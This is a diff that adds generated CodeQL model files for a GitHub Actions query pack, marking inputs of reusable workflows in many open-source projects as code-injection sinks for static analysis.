@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.context", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.tags", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.image-name", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.image-uuid", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.staging-repo", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.staging", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml new file mode 100644 index 00000000000..f7aafb13455 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "inputs.test", "code-injection", "generated"] + - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml new file mode 100644 index 00000000000..6107ae0e57c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mudler/localai/.github/workflows/image_build.yml", "*", "inputs.latest-image-aio", "code-injection", "generated"] + - ["mudler/localai/.github/workflows/image_build.yml", "*", "inputs.latest-image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml new file mode 100644 index 00000000000..74e0182cc4f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.amazonflag", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.magiskver", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.root", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.gapps", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.amazonflag", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.magiskver", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.root", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.gapps", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml new file mode 100644 index 00000000000..4bbd06a86f5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "inputs.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml new file mode 100644 index 00000000000..59bdab8f39b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "inputs.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml new file mode 100644 index 00000000000..6988e25d41c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "inputs.target_platform", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "inputs.fprime_location", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "inputs.default_target_ref", "code-injection", "generated"] + - ["nasa/fprime/.github/workflows/reusable-get-pr-branch.yml", "*", "inputs.target_repository", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml new file mode 100644 index 00000000000..3c025f59b78 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "inputs.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml new file mode 100644 index 00000000000..5de0d170d40 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "inputs.with_default", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "inputs.required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.string_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.number_optional", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.number_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.bool_optional", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.bool_required", "code-injection", "generated"] + - ["nektos/act/pkg/runner/testdata/.github/workflows/local-reusable-workflow.yml", "*", "inputs.string_optional", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml new file mode 100644 index 00000000000..19d38d1241d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "inputs.build_flags", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml new file mode 100644 index 00000000000..b1c787677a6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.custom_run_id", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.non_validator_mode", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.additional_optimism_options", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.network", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.additional_options", "code-injection", "generated"] + - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "inputs.cl_client", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml new file mode 100644 index 00000000000..249c734f55b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "inputs.agent_version", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/post_deploy_agent.yml", "*", "inputs.test_mode", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/multiverse_run.yml", "*", "inputs.agentVersion", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "inputs.dry-run", "code-injection", "generated"] + - ["newrelic/newrelic-dotnet-agent/.github/workflows/build_download_site_index_files.yml", "*", "inputs.prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml new file mode 100644 index 00000000000..46951b5436d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "inputs.page", "code-injection", "generated"] + - ["newrelic/newrelic-java-agent/.github/workflows/GHA-Unit-Tests.yaml", "*", "inputs.agent-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml new file mode 100644 index 00000000000..cd1d0f318ef --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "inputs.changelog_file", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "inputs.workflows", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "inputs.changelog_file", "code-injection", "generated"] + - ["newrelic/node-newrelic/.github/workflows/prep-release.yml", "*", "inputs.release_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml new file mode 100644 index 00000000000..4055874a790 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "inputs.AppVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "inputs.PupNetVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "inputs.AppVersion", "code-injection", "generated"] + - ["nexus-mods/nexusmods.app/.github/workflows/build-linux-pupnet.yaml", "*", "inputs.PupNetVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml new file mode 100644 index 00000000000..bccd7271b08 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml 
@@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "inputs.dry_run", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.dry_run", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/plus-release.yml", "*", "inputs.short_target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.short_target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.target_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.source_tag", "code-injection", "generated"] + - ["nginxinc/kubernetes-ingress/.github/workflows/oss-release.yml", "*", "inputs.dry_run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml new file mode 100644 index 00000000000..56528159143 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "inputs.shard", "code-injection", "generated"] + - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "inputs.db", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml new file mode 100644 index 00000000000..c4a9b07ed99 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml 
@@ -0,0 +1,20 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "inputs.docker_image", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "inputs.terraform_workspace", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_environment", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_sentry_dsn", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_webhook_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_ws_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-widget-deploy.yml", "*", "inputs.react_app_api_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_hubspot_embed", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_mail_server_domain", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_environment", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_sentry_dsn", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_widget_embed_path", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_webhook_url", "code-injection", "generated"] + - ["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_ws_url", "code-injection", "generated"] + - 
["novuhq/novu/.github/workflows/reusable-web-deploy.yml", "*", "inputs.react_app_api_url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml new file mode 100644 index 00000000000..db4f26083a0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml new file mode 100644 index 00000000000..c12a079e2e2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/cli/.github/workflows/node-integration.yml", "*", "inputs.npmVersion", "code-injection", "generated"] + - ["npm/cli/.github/workflows/node-integration.yml", "*", "inputs.nodeVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml new file mode 100644 index 00000000000..3b7122a7a13 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml new file mode 100644 index 00000000000..3e80edaaaff --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml new file mode 100644 index 00000000000..99717acf024 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/ini/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml new file mode 100644 index 00000000000..d9a066c2b22 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml new file mode 100644 index 00000000000..83e68740ac0 --- /dev/null 
+++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml new file mode 100644 index 00000000000..45f05ea8826 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml new file mode 100644 index 00000000000..1cd25da918f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml new file mode 100644 index 00000000000..2d5a077f1f4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/node-which/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml new file mode 100644 index 00000000000..98571dfc5d9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/nopt/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml new file mode 100644 index 00000000000..8cbd1927fe0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml new file mode 100644 index 00000000000..6d3466f0927 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "inputs.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml new file mode 100644 index 00000000000..c7178a298ef --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.base-branch", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.repo", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.current-branch", "code-injection", "generated"] + - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "inputs.chain", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml new file mode 100644 index 00000000000..08feb2033ff --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/windows-build-clang.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/macos-build.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/macos-build-arm.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/linux-build-gcc.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] + - ["open-goal/jak-project/.github/workflows/linux-build-clang.yaml", "*", "inputs.cmakePreset", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml new file mode 100644 index 00000000000..3483cc13b9e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "inputs.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml new file mode 100644 index 00000000000..45350e121a0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "inputs.project-name", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml new file mode 100644 index 00000000000..9665157b3ad --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-name", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "inputs.project-build-commands", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml new file mode 100644 index 00000000000..9ef65a67c03 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "inputs.success", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-smoke-test-images.yml", "*", "inputs.project", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml new file mode 100644 index 00000000000..eade5ecdae1 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "inputs.npm-workspace-args", "code-injection", "generated"] \ No newline at end 